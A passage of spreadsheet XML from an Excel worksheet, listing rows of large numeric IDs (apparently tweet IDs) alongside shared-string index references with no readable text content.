        <v>16252</v>
      </c>
    </row>
    <row r="6685" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6685">
        <v>1.23340443038659E+18</v>
      </c>
      <c r="B6685" t="s">
        <v>16253</v>
      </c>
      <c r="C6685" t="s">
        <v>1</v>
      </c>
      <c r="D6685" t="s">
        <v>16254</v>
      </c>
      <c r="E6685" t="s">
        <v>16255</v>
      </c>
    </row>
    <row r="6686" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6686">
        <v>1.2334042389292401E+18</v>
      </c>
      <c r="B6686" t="s">
        <v>16256</v>
      </c>
      <c r="C6686" t="s">
        <v>1</v>
      </c>
      <c r="D6686" t="s">
        <v>16257</v>
      </c>
      <c r="E6686" t="s">
        <v>2442</v>
      </c>
    </row>
    <row r="6687" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6687">
        <v>1.23340408150431E+18</v>
      </c>
      <c r="B6687" t="s">
        <v>16258</v>
      </c>
      <c r="C6687" t="s">
        <v>1</v>
      </c>
      <c r="D6687" t="s">
        <v>16259</v>
      </c>
      <c r="E6687" t="s">
        <v>2516</v>
      </c>
    </row>
    <row r="6688" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6688">
        <v>1.23340401041936E+18</v>
      </c>
      <c r="B6688" t="s">
        <v>16260</v>
      </c>
      <c r="C6688" t="s">
        <v>1</v>
      </c>
      <c r="D6688" t="s">
        <v>16261</v>
      </c>
      <c r="E6688" t="s">
        <v>15075</v>
      </c>
    </row>
    <row r="6689" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6689">
        <v>1.2334037314940301E+18</v>
      </c>
      <c r="B6689" t="s">
        <v>16262</v>
      </c>
      <c r="C6689" t="s">
        <v>1</v>
      </c>
      <c r="D6689" t="s">
        <v>16263</v>
      </c>
      <c r="E6689" t="s">
        <v>16264</v>
      </c>
    </row>
    <row r="6690" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6690">
        <v>1.2334036525488399E+18</v>
      </c>
      <c r="B6690" t="s">
        <v>16265</v>
      </c>
      <c r="C6690" t="s">
        <v>1</v>
      </c>
      <c r="D6690" t="s">
        <v>16266</v>
      </c>
      <c r="E6690" t="s">
        <v>16267</v>
      </c>
    </row>
    <row r="6691" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6691">
        <v>1.2334027628571799E+18</v>
      </c>
      <c r="B6691" t="s">
        <v>16268</v>
      </c>
      <c r="C6691" t="s">
        <v>1</v>
      </c>
      <c r="D6691" t="s">
        <v>16269</v>
      </c>
      <c r="E6691" t="s">
        <v>1177</v>
      </c>
    </row>
    <row r="6692" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6692">
        <v>1.23340252532543E+18</v>
      </c>
      <c r="B6692" t="s">
        <v>16270</v>
      </c>
      <c r="C6692" t="s">
        <v>1</v>
      </c>
      <c r="D6692" t="s">
        <v>16271</v>
      </c>
      <c r="E6692" t="s">
        <v>16272</v>
      </c>
    </row>
    <row r="6693" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6693">
        <v>1.2334020342731E+18</v>
      </c>
      <c r="B6693" t="s">
        <v>16273</v>
      </c>
      <c r="C6693" t="s">
        <v>1</v>
      </c>
      <c r="D6693" t="s">
        <v>16274</v>
      </c>
      <c r="E6693" t="s">
        <v>16275</v>
      </c>
    </row>
    <row r="6694" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6694">
        <v>1.2334014761831301E+18</v>
      </c>
      <c r="B6694" t="s">
        <v>16276</v>
      </c>
      <c r="C6694" t="s">
        <v>1</v>
      </c>
      <c r="D6694" t="s">
        <v>16277</v>
      </c>
      <c r="E6694" t="s">
        <v>16278</v>
      </c>
    </row>
    <row r="6695" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6695">
        <v>1.2334014684906099E+18</v>
      </c>
      <c r="B6695" t="s">
        <v>16279</v>
      </c>
      <c r="C6695" t="s">
        <v>1</v>
      </c>
      <c r="D6695" t="s">
        <v>16280</v>
      </c>
      <c r="E6695" t="s">
        <v>15388</v>
      </c>
    </row>
    <row r="6696" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6696">
        <v>1.2334014466720699E+18</v>
      </c>
      <c r="B6696" t="s">
        <v>16281</v>
      </c>
      <c r="C6696" t="s">
        <v>1</v>
      </c>
      <c r="D6696" t="s">
        <v>16282</v>
      </c>
      <c r="E6696" t="s">
        <v>16283</v>
      </c>
    </row>
    <row r="6697" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6697">
        <v>1.2334011320069399E+18</v>
      </c>
      <c r="B6697" t="s">
        <v>16284</v>
      </c>
      <c r="C6697" t="s">
        <v>1</v>
      </c>
      <c r="D6697" t="s">
        <v>16285</v>
      </c>
      <c r="E6697" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="6698" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6698">
        <v>1.2334011268101901E+18</v>
      </c>
      <c r="B6698" t="s">
        <v>16286</v>
      </c>
      <c r="C6698" t="s">
        <v>1</v>
      </c>
      <c r="D6698" t="s">
        <v>16287</v>
      </c>
      <c r="E6698" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="6699" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6699">
        <v>1.2334003461200799E+18</v>
      </c>
      <c r="B6699" t="s">
        <v>16288</v>
      </c>
      <c r="C6699" t="s">
        <v>1</v>
      </c>
      <c r="D6699" t="s">
        <v>16289</v>
      </c>
      <c r="E6699" t="s">
        <v>16290</v>
      </c>
    </row>
    <row r="6700" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6700">
        <v>1.23340022637281E+18</v>
      </c>
      <c r="B6700" t="s">
        <v>16291</v>
      </c>
      <c r="C6700" t="s">
        <v>1</v>
      </c>
      <c r="D6700" t="s">
        <v>16292</v>
      </c>
      <c r="E6700" t="s">
        <v>16293</v>
      </c>
    </row>
    <row r="6701" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6701">
        <v>1.23339995538722E+18</v>
      </c>
      <c r="B6701" t="s">
        <v>16294</v>
      </c>
      <c r="C6701" t="s">
        <v>1</v>
      </c>
      <c r="D6701" t="s">
        <v>16295</v>
      </c>
      <c r="E6701" t="s">
        <v>5485</v>
      </c>
    </row>
    <row r="6702" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6702">
        <v>1.2333993076315699E+18</v>
      </c>
      <c r="B6702" t="s">
        <v>16296</v>
      </c>
      <c r="C6702" t="s">
        <v>1</v>
      </c>
      <c r="D6702" t="s">
        <v>16297</v>
      </c>
      <c r="E6702" t="s">
        <v>8500</v>
      </c>
    </row>
    <row r="6703" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6703">
        <v>1.2333992949354199E+18</v>
      </c>
      <c r="B6703" t="s">
        <v>16298</v>
      </c>
      <c r="C6703" t="s">
        <v>1</v>
      </c>
      <c r="D6703" t="s">
        <v>16299</v>
      </c>
      <c r="E6703" t="s">
        <v>16300</v>
      </c>
    </row>
    <row r="6704" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6704">
        <v>1.23339904573922E+18</v>
      </c>
      <c r="B6704" t="s">
        <v>16301</v>
      </c>
      <c r="C6704" t="s">
        <v>1</v>
      </c>
      <c r="D6704" t="s">
        <v>16302</v>
      </c>
      <c r="E6704" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="6705" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6705">
        <v>1.2333990201831099E+18</v>
      </c>
      <c r="B6705" t="s">
        <v>16303</v>
      </c>
      <c r="C6705" t="s">
        <v>1</v>
      </c>
      <c r="D6705" t="s">
        <v>16304</v>
      </c>
      <c r="E6705" t="s">
        <v>14670</v>
      </c>
    </row>
    <row r="6706" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6706">
        <v>1.2333990118659599E+18</v>
      </c>
      <c r="B6706" t="s">
        <v>16305</v>
      </c>
      <c r="C6706" t="s">
        <v>1</v>
      </c>
      <c r="D6706" t="s">
        <v>16306</v>
      </c>
      <c r="E6706" t="s">
        <v>16307</v>
      </c>
    </row>
    <row r="6707" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6707">
        <v>1.23339896800611E+18</v>
      </c>
      <c r="B6707" t="s">
        <v>16308</v>
      </c>
      <c r="C6707" t="s">
        <v>1</v>
      </c>
      <c r="D6707" t="s">
        <v>16309</v>
      </c>
      <c r="E6707" t="s">
        <v>14335</v>
      </c>
    </row>
    <row r="6708" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6708">
        <v>1.23339895284797E+18</v>
      </c>
      <c r="B6708" t="s">
        <v>16310</v>
      </c>
      <c r="C6708" t="s">
        <v>1</v>
      </c>
      <c r="D6708" t="s">
        <v>16311</v>
      </c>
      <c r="E6708" t="s">
        <v>13536</v>
      </c>
    </row>
    <row r="6709" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6709">
        <v>1.2333989527344901E+18</v>
      </c>
      <c r="B6709" t="s">
        <v>16310</v>
      </c>
      <c r="C6709" t="s">
        <v>1</v>
      </c>
      <c r="D6709" t="s">
        <v>16312</v>
      </c>
      <c r="E6709" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="6710" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6710">
        <v>1.23339868150579E+18</v>
      </c>
      <c r="B6710" t="s">
        <v>16313</v>
      </c>
      <c r="C6710" t="s">
        <v>1</v>
      </c>
      <c r="D6710" t="s">
        <v>16314</v>
      </c>
      <c r="E6710" t="s">
        <v>16315</v>
      </c>
    </row>
    <row r="6711" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6711">
        <v>1.23339854722096E+18</v>
      </c>
      <c r="B6711" t="s">
        <v>16316</v>
      </c>
      <c r="C6711" t="s">
        <v>1</v>
      </c>
      <c r="D6711" t="s">
        <v>16317</v>
      </c>
      <c r="E6711" t="s">
        <v>16318</v>
      </c>
    </row>
    <row r="6712" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6712">
        <v>1.2333983749399401E+18</v>
      </c>
      <c r="B6712" t="s">
        <v>16319</v>
      </c>
      <c r="C6712" t="s">
        <v>1</v>
      </c>
      <c r="D6712" t="s">
        <v>16320</v>
      </c>
      <c r="E6712" t="s">
        <v>16321</v>
      </c>
    </row>
    <row r="6713" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6713">
        <v>1.2333982431632901E+18</v>
      </c>
      <c r="B6713" t="s">
        <v>16322</v>
      </c>
      <c r="C6713" t="s">
        <v>1</v>
      </c>
      <c r="D6713" t="s">
        <v>16323</v>
      </c>
      <c r="E6713" t="s">
        <v>16324</v>
      </c>
    </row>
    <row r="6714" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6714">
        <v>1.23339700363326E+18</v>
      </c>
      <c r="B6714" t="s">
        <v>16325</v>
      </c>
      <c r="C6714" t="s">
        <v>1</v>
      </c>
      <c r="D6714" t="s">
        <v>16326</v>
      </c>
      <c r="E6714" t="s">
        <v>16327</v>
      </c>
    </row>
    <row r="6715" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6715">
        <v>1.2333966469957701E+18</v>
      </c>
      <c r="B6715" t="s">
        <v>16328</v>
      </c>
      <c r="C6715" t="s">
        <v>1</v>
      </c>
      <c r="D6715" t="s">
        <v>16329</v>
      </c>
      <c r="E6715" t="s">
        <v>5989</v>
      </c>
    </row>
    <row r="6716" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6716">
        <v>1.2333963938108201E+18</v>
      </c>
      <c r="B6716" t="s">
        <v>16330</v>
      </c>
      <c r="C6716" t="s">
        <v>1</v>
      </c>
      <c r="D6716" t="s">
        <v>16331</v>
      </c>
      <c r="E6716" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="6717" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6717">
        <v>1.2333958219174001E+18</v>
      </c>
      <c r="B6717" t="s">
        <v>16332</v>
      </c>
      <c r="C6717" t="s">
        <v>1</v>
      </c>
      <c r="D6717" t="s">
        <v>16333</v>
      </c>
      <c r="E6717" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="6718" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6718">
        <v>1.2333956408870999E+18</v>
      </c>
      <c r="B6718" t="s">
        <v>16334</v>
      </c>
      <c r="C6718" t="s">
        <v>1</v>
      </c>
      <c r="D6718" t="s">
        <v>16335</v>
      </c>
      <c r="E6718" t="s">
        <v>16336</v>
      </c>
    </row>
    <row r="6719" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6719">
        <v>1.2333954702208901E+18</v>
      </c>
      <c r="B6719" t="s">
        <v>16337</v>
      </c>
      <c r="C6719" t="s">
        <v>1</v>
      </c>
      <c r="D6719" t="s">
        <v>16338</v>
      </c>
      <c r="E6719" t="s">
        <v>16339</v>
      </c>
    </row>
    <row r="6720" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6720">
        <v>1.2333953891952799E+18</v>
      </c>
      <c r="B6720" t="s">
        <v>16340</v>
      </c>
      <c r="C6720" t="s">
        <v>1</v>
      </c>
      <c r="D6720" t="s">
        <v>16341</v>
      </c>
      <c r="E6720" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="6721" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6721">
        <v>1.2333952368245901E+18</v>
      </c>
      <c r="B6721" t="s">
        <v>16342</v>
      </c>
      <c r="C6721" t="s">
        <v>1</v>
      </c>
      <c r="D6721" t="s">
        <v>16343</v>
      </c>
      <c r="E6721" t="s">
        <v>16344</v>
      </c>
    </row>
    <row r="6722" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6722">
        <v>1.2333945299585999E+18</v>
      </c>
      <c r="B6722" t="s">
        <v>16345</v>
      </c>
      <c r="C6722" t="s">
        <v>1</v>
      </c>
      <c r="D6722" t="s">
        <v>6149</v>
      </c>
      <c r="E6722" t="s">
        <v>1317</v>
      </c>
    </row>
    <row r="6723" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6723">
        <v>1.23339449477679E+18</v>
      </c>
      <c r="B6723" t="s">
        <v>16346</v>
      </c>
      <c r="C6723" t="s">
        <v>1</v>
      </c>
      <c r="D6723" t="s">
        <v>16347</v>
      </c>
      <c r="E6723" t="s">
        <v>16348</v>
      </c>
    </row>
    <row r="6724" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6724">
        <v>1.23339446950607E+18</v>
      </c>
      <c r="B6724" t="s">
        <v>16349</v>
      </c>
      <c r="C6724" t="s">
        <v>1</v>
      </c>
      <c r="D6724" t="s">
        <v>16350</v>
      </c>
      <c r="E6724" t="s">
        <v>16336</v>
      </c>
    </row>
    <row r="6725" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6725">
        <v>1.23339442212286E+18</v>
      </c>
      <c r="B6725" t="s">
        <v>16351</v>
      </c>
      <c r="C6725" t="s">
        <v>1</v>
      </c>
      <c r="D6725" t="s">
        <v>16352</v>
      </c>
      <c r="E6725" t="s">
        <v>2235</v>
      </c>
    </row>
    <row r="6726" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6726">
        <v>1.2333940479869199E+18</v>
      </c>
      <c r="B6726" t="s">
        <v>16353</v>
      </c>
      <c r="C6726" t="s">
        <v>1</v>
      </c>
      <c r="D6726" t="s">
        <v>16354</v>
      </c>
      <c r="E6726" t="s">
        <v>16355</v>
      </c>
    </row>
    <row r="6727" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6727">
        <v>1.2333934830140101E+18</v>
      </c>
      <c r="B6727" t="s">
        <v>16356</v>
      </c>
      <c r="C6727" t="s">
        <v>1</v>
      </c>
      <c r="D6727" t="s">
        <v>16357</v>
      </c>
      <c r="E6727" t="s">
        <v>16358</v>
      </c>
    </row>
    <row r="6728" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6728">
        <v>1.2333929126768499E+18</v>
      </c>
      <c r="B6728" t="s">
        <v>16359</v>
      </c>
      <c r="C6728" t="s">
        <v>1</v>
      </c>
      <c r="D6728" t="s">
        <v>16360</v>
      </c>
      <c r="E6728" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="6729" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6729">
        <v>1.23339269993342E+18</v>
      </c>
      <c r="B6729" t="s">
        <v>16361</v>
      </c>
      <c r="C6729" t="s">
        <v>1</v>
      </c>
      <c r="D6729" t="s">
        <v>16362</v>
      </c>
      <c r="E6729" t="s">
        <v>16363</v>
      </c>
    </row>
    <row r="6730" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6730">
        <v>1.2333925548272399E+18</v>
      </c>
      <c r="B6730" t="s">
        <v>16364</v>
      </c>
      <c r="C6730" t="s">
        <v>1</v>
      </c>
      <c r="D6730" t="s">
        <v>16365</v>
      </c>
      <c r="E6730" t="s">
        <v>2644</v>
      </c>
    </row>
    <row r="6731" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6731">
        <v>1.2333924629929999E+18</v>
      </c>
      <c r="B6731" t="s">
        <v>16366</v>
      </c>
      <c r="C6731" t="s">
        <v>1</v>
      </c>
      <c r="D6731" t="s">
        <v>16367</v>
      </c>
      <c r="E6731" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="6732" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6732">
        <v>1.23339241668367E+18</v>
      </c>
      <c r="B6732" t="s">
        <v>16368</v>
      </c>
      <c r="C6732" t="s">
        <v>1</v>
      </c>
      <c r="D6732" t="s">
        <v>16369</v>
      </c>
      <c r="E6732" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="6733" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6733">
        <v>1.23339204808401E+18</v>
      </c>
      <c r="B6733" t="s">
        <v>16370</v>
      </c>
      <c r="C6733" t="s">
        <v>1</v>
      </c>
      <c r="D6733" t="s">
        <v>16371</v>
      </c>
      <c r="E6733" t="s">
        <v>6451</v>
      </c>
    </row>
    <row r="6734" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6734">
        <v>1.23339181124831E+18</v>
      </c>
      <c r="B6734" t="s">
        <v>16372</v>
      </c>
      <c r="C6734" t="s">
        <v>1</v>
      </c>
      <c r="D6734" t="s">
        <v>16373</v>
      </c>
      <c r="E6734" t="s">
        <v>10626</v>
      </c>
    </row>
    <row r="6735" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6735">
        <v>1.2333918048479301E+18</v>
      </c>
      <c r="B6735" t="s">
        <v>16374</v>
      </c>
      <c r="C6735" t="s">
        <v>1</v>
      </c>
      <c r="D6735" t="s">
        <v>16375</v>
      </c>
      <c r="E6735" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="6736" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6736">
        <v>1.23339167331454E+18</v>
      </c>
      <c r="B6736" t="s">
        <v>16376</v>
      </c>
      <c r="C6736" t="s">
        <v>1</v>
      </c>
      <c r="D6736" t="s">
        <v>16377</v>
      </c>
      <c r="E6736" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="6737" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6737">
        <v>1.2333916550106099E+18</v>
      </c>
      <c r="B6737" t="s">
        <v>16378</v>
      </c>
      <c r="C6737" t="s">
        <v>1</v>
      </c>
      <c r="D6737" t="s">
        <v>16379</v>
      </c>
      <c r="E6737" t="s">
        <v>2788</v>
      </c>
    </row>
    <row r="6738" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6738">
        <v>1.23339099111106E+18</v>
      </c>
      <c r="B6738" t="s">
        <v>16380</v>
      </c>
      <c r="C6738" t="s">
        <v>1</v>
      </c>
      <c r="D6738" t="s">
        <v>16381</v>
      </c>
      <c r="E6738" t="s">
        <v>16382</v>
      </c>
    </row>
    <row r="6739" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6739">
        <v>1.2333907744207301E+18</v>
      </c>
      <c r="B6739" t="s">
        <v>16383</v>
      </c>
      <c r="C6739" t="s">
        <v>1</v>
      </c>
      <c r="D6739" t="s">
        <v>16384</v>
      </c>
      <c r="E6739" t="s">
        <v>2804</v>
      </c>
    </row>
    <row r="6740" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6740">
        <v>1.23338984587315E+18</v>
      </c>
      <c r="B6740" t="s">
        <v>16385</v>
      </c>
      <c r="C6740" t="s">
        <v>1</v>
      </c>
      <c r="D6740" t="s">
        <v>16386</v>
      </c>
      <c r="E6740" t="s">
        <v>2504</v>
      </c>
    </row>
    <row r="6741" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6741">
        <v>1.2333895895381801E+18</v>
      </c>
      <c r="B6741" t="s">
        <v>16387</v>
      </c>
      <c r="C6741" t="s">
        <v>1</v>
      </c>
      <c r="D6741" t="s">
        <v>16388</v>
      </c>
      <c r="E6741" t="s">
        <v>11348</v>
      </c>
    </row>
    <row r="6742" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6742">
        <v>1.2333894230201201E+18</v>
      </c>
      <c r="B6742" t="s">
        <v>16389</v>
      </c>
      <c r="C6742" t="s">
        <v>1</v>
      </c>
      <c r="D6742" t="s">
        <v>16390</v>
      </c>
      <c r="E6742" t="s">
        <v>16391</v>
      </c>
    </row>
    <row r="6743" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6743">
        <v>1.2333889396476201E+18</v>
      </c>
      <c r="B6743" t="s">
        <v>16392</v>
      </c>
      <c r="C6743" t="s">
        <v>1</v>
      </c>
      <c r="D6743" t="s">
        <v>16393</v>
      </c>
      <c r="E6743" t="s">
        <v>16394</v>
      </c>
    </row>
    <row r="6744" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6744">
        <v>1.2333883534096799E+18</v>
      </c>
      <c r="B6744" t="s">
        <v>16395</v>
      </c>
      <c r="C6744" t="s">
        <v>1</v>
      </c>
      <c r="D6744" t="s">
        <v>16396</v>
      </c>
      <c r="E6744" t="s">
        <v>2451</v>
      </c>
    </row>
    <row r="6745" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6745">
        <v>1.23338812553742E+18</v>
      </c>
      <c r="B6745" t="s">
        <v>16397</v>
      </c>
      <c r="C6745" t="s">
        <v>1</v>
      </c>
      <c r="D6745" t="s">
        <v>16398</v>
      </c>
      <c r="E6745" t="s">
        <v>16394</v>
      </c>
    </row>
    <row r="6746" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6746">
        <v>1.23338789754322E+18</v>
      </c>
      <c r="B6746" t="s">
        <v>16399</v>
      </c>
      <c r="C6746" t="s">
        <v>1</v>
      </c>
      <c r="D6746" t="s">
        <v>16400</v>
      </c>
      <c r="E6746" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="6747" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6747">
        <v>1.2333876623812101E+18</v>
      </c>
      <c r="B6747" t="s">
        <v>16401</v>
      </c>
      <c r="C6747" t="s">
        <v>1</v>
      </c>
      <c r="D6747" t="s">
        <v>16402</v>
      </c>
      <c r="E6747" t="s">
        <v>16403</v>
      </c>
    </row>
    <row r="6748" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6748">
        <v>1.2333869416783301E+18</v>
      </c>
      <c r="B6748" t="s">
        <v>16404</v>
      </c>
      <c r="C6748" t="s">
        <v>1</v>
      </c>
      <c r="D6748" t="s">
        <v>16405</v>
      </c>
      <c r="E6748" t="s">
        <v>16406</v>
      </c>
    </row>
    <row r="6749" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6749">
        <v>1.2333858785816399E+18</v>
      </c>
      <c r="B6749" t="s">
        <v>16407</v>
      </c>
      <c r="C6749" t="s">
        <v>1</v>
      </c>
      <c r="D6749" t="s">
        <v>16408</v>
      </c>
      <c r="E6749" t="s">
        <v>16409</v>
      </c>
    </row>
    <row r="6750" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6750">
        <v>1.2333851307832699E+18</v>
      </c>
      <c r="B6750" t="s">
        <v>16410</v>
      </c>
      <c r="C6750" t="s">
        <v>1</v>
      </c>
      <c r="D6750" t="s">
        <v>16411</v>
      </c>
      <c r="E6750" t="s">
        <v>16412</v>
      </c>
    </row>
    <row r="6751" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6751">
        <v>1.2333850194791501E+18</v>
      </c>
      <c r="B6751" t="s">
        <v>16413</v>
      </c>
      <c r="C6751" t="s">
        <v>1</v>
      </c>
      <c r="D6751" t="s">
        <v>16414</v>
      </c>
      <c r="E6751" t="s">
        <v>16415</v>
      </c>
    </row>
    <row r="6752" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6752">
        <v>1.2333848673808699E+18</v>
      </c>
      <c r="B6752" t="s">
        <v>16416</v>
      </c>
      <c r="C6752" t="s">
        <v>1</v>
      </c>
      <c r="D6752" t="s">
        <v>16417</v>
      </c>
      <c r="E6752" t="s">
        <v>2415</v>
      </c>
    </row>
    <row r="6753" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6753">
        <v>1.2333843926236001E+18</v>
      </c>
      <c r="B6753" t="s">
        <v>16418</v>
      </c>
      <c r="C6753" t="s">
        <v>1</v>
      </c>
      <c r="D6753" t="s">
        <v>16419</v>
      </c>
      <c r="E6753" t="s">
        <v>16420</v>
      </c>
    </row>
    <row r="6754" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6754">
        <v>1.23338437282224E+18</v>
      </c>
      <c r="B6754" t="s">
        <v>16421</v>
      </c>
      <c r="C6754" t="s">
        <v>1</v>
      </c>
      <c r="D6754" t="s">
        <v>16422</v>
      </c>
      <c r="E6754" t="s">
        <v>16423</v>
      </c>
    </row>
    <row r="6755" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6755">
        <v>1.23338431810337E+18</v>
      </c>
      <c r="B6755" t="s">
        <v>16424</v>
      </c>
      <c r="C6755" t="s">
        <v>1</v>
      </c>
      <c r="D6755" t="s">
        <v>16425</v>
      </c>
      <c r="E6755" t="s">
        <v>16426</v>
      </c>
    </row>
    <row r="6756" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6756">
        <v>1.23338398932865E+18</v>
      </c>
      <c r="B6756" t="s">
        <v>16427</v>
      </c>
      <c r="C6756" t="s">
        <v>1</v>
      </c>
      <c r="D6756" t="s">
        <v>16428</v>
      </c>
      <c r="E6756" t="s">
        <v>16429</v>
      </c>
    </row>
    <row r="6757" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6757">
        <v>1.2333839214941701E+18</v>
      </c>
      <c r="B6757" t="s">
        <v>16430</v>
      </c>
      <c r="C6757" t="s">
        <v>1</v>
      </c>
      <c r="D6757" t="s">
        <v>16431</v>
      </c>
      <c r="E6757" t="s">
        <v>8868</v>
      </c>
    </row>
    <row r="6758" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6758">
        <v>1.23338391631008E+18</v>
      </c>
      <c r="B6758" t="s">
        <v>16432</v>
      </c>
      <c r="C6758" t="s">
        <v>1</v>
      </c>
      <c r="D6758" t="s">
        <v>16433</v>
      </c>
      <c r="E6758" t="s">
        <v>16434</v>
      </c>
    </row>
    <row r="6759" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6759">
        <v>1.2333838613435699E+18</v>
      </c>
      <c r="B6759" t="s">
        <v>16435</v>
      </c>
      <c r="C6759" t="s">
        <v>1</v>
      </c>
      <c r="D6759" t="s">
        <v>16436</v>
      </c>
      <c r="E6759" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="6760" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6760">
        <v>1.2333836301451899E+18</v>
      </c>
      <c r="B6760" t="s">
        <v>16437</v>
      </c>
      <c r="C6760" t="s">
        <v>1</v>
      </c>
      <c r="D6760" t="s">
        <v>16438</v>
      </c>
      <c r="E6760" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="6761" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6761">
        <v>1.2333836232876201E+18</v>
      </c>
      <c r="B6761" t="s">
        <v>16439</v>
      </c>
      <c r="C6761" t="s">
        <v>1</v>
      </c>
      <c r="D6761" t="s">
        <v>16440</v>
      </c>
      <c r="E6761" t="s">
        <v>16441</v>
      </c>
    </row>
    <row r="6762" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6762">
        <v>1.2333822589434099E+18</v>
      </c>
      <c r="B6762" t="s">
        <v>16442</v>
      </c>
      <c r="C6762" t="s">
        <v>1</v>
      </c>
      <c r="D6762" t="s">
        <v>16443</v>
      </c>
      <c r="E6762" t="s">
        <v>16444</v>
      </c>
    </row>
    <row r="6763" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6763">
        <v>1.2333804217501801E+18</v>
      </c>
      <c r="B6763" t="s">
        <v>16445</v>
      </c>
      <c r="C6763" t="s">
        <v>1</v>
      </c>
      <c r="D6763" t="s">
        <v>16446</v>
      </c>
      <c r="E6763" t="s">
        <v>16447</v>
      </c>
    </row>
    <row r="6764" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6764">
        <v>1.2333802428085399E+18</v>
      </c>
      <c r="B6764" t="s">
        <v>16448</v>
      </c>
      <c r="C6764" t="s">
        <v>1</v>
      </c>
      <c r="D6764" t="s">
        <v>16449</v>
      </c>
      <c r="E6764" t="s">
        <v>16450</v>
      </c>
    </row>
    <row r="6765" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6765">
        <v>1.2333801247095301E+18</v>
      </c>
      <c r="B6765" t="s">
        <v>16451</v>
      </c>
      <c r="C6765" t="s">
        <v>1</v>
      </c>
      <c r="D6765" t="s">
        <v>16452</v>
      </c>
      <c r="E6765" t="s">
        <v>1177</v>
      </c>
    </row>
